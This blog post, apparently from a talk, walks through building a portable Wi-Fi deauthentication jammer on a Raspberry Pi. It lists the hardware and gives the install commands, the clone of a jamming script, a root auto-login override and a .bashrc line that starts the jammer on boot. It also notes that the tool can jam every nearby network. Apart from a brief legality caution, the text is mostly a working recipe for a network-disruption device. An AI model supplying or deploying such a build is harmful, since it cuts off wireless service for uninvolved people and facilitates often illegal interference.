You can find the talk materials and slides right here.
My latest mini-project involves deauth attacks of a portable nature. I give you, the Wifi Grenade. Just be warned, this talk is juvenile, script-kiddieish, and probably irresponsible. In this post, I’ll show you how to build it.
To cover myself, I have to warn you of some things:
First, go shopping, you’ll need some things (Amazon referral links below).
[$50] Raspberry Pi 2 Model B with case
[$6] 8GB Micro SD Card
[$40] Alfa Wireless Card (G/N 2W)
[$40] Anker 16000mah Battery
When you have all of your gear, let’s get the OS installed:
I’m using Arch Linux ARM for my Pi, follow the instructions
here to
get the base OS installed, then run your updates with pacman -Syyu
.
Next run pacman -S scapy iw wireless_tools git
to pull the required
tools and libraries.
Next, clone Dan McInerney’s fantastic Wifi Jammer script from GitHub. This will put the code into a directory called “wifijammer”.
git clone https://github.com/DanMcInerney/wifijammer
Next, we have to set an auto-login. Create
/etc/systemd/system/getty@tty1.service.d/override.conf
with the
following contents:
[Service]
ExecStart=
ExecStart=-/sbin/agetty --autologin root --noclear %I 38400 linux
Next, we have to set the jammer to run on boot. The simplest way to do
this is with .bashrc
, modify the contents with the following:
exec /usr/bin/python2 /root/wifijammer/wifijammer.py -a 11:22:33:44:55:66
Now your system will boot directly into the root user and start the wifi
jammer. By default, the jammer is set to only jam 11:22:33:44:55:66.
Modify this script to specify which network you would like to jam.
Without -a
, wifijammer.py will jam any and all networks it comes
across, be careful and only attack networks you are legally allowed to.